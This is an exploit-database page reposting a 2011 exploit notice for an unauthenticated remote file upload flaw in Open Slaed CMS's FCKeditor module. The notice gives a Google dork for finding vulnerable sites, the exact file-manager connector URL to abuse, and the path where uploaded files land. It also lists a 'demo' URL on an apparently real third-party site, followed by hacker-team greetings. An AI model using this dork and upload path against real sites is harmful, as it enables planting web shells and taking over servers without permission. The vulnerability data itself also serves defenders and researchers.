Advertisement






Open Slaed CMS (fckeditor) Remote File Upload

CVE Category Price Severity
N/A CWE-434 N/A High
Author Risk Exploitation Type Date
exploitalert.com High Remote 2011-07-14
CPE
cpe:cpe:/a:slaed_cms:fckeditor
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2011070029

Below is a copy:

# Exploit Title: Open Slaed CMS (fckeditor) Remote File Upload
# Google Dork: "Powered by Open SLAED"
# Date: 2011-06-08
# Author: Sepehr Security Team
# Discovered By: thE_Knight
# Software Site:  http://www.slaed.net/
# Software Link:  http://www.slaed.net/uploads/files/public/open_slaed.zip
# Software Link 2(Persian Version):  http://slaed.ir/files-view-2.html
# Version: 1.2 (and maybe other versions)
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[ Vulnerable File ]
http://site.com/[path]/modules/fckeditor/editor/filemanager/browser/default/browser.html?Connector=../../connectors/php/connector.php

[ Uploaded File ]
http://site.com/uploads/all/file/*yourfile*

[DEMO:]
http://www.dvgsk.com/modules/fckeditor/editor/filemanager/browser/default/browser.html?Connector=../../connectors/php/connector.php

*NOTE: even if "OPEN SLAED" was installed on a sub folder, your files will be uploaded to "uploads/all/file/yourfile" at root directory

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[Spc. Thanks]

H3X - Einstein - Naboodgar - Wizard - CONS7ANTINE - Mr.Amir-Masoud - nImaarek - saman_pd09 - GrEEn-ErRor - _SENATOR_

All Sepehr Sceurity Team Members And All Iranian Hack3rs

#Home Page : wWw.Sepehr-Team.orG

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum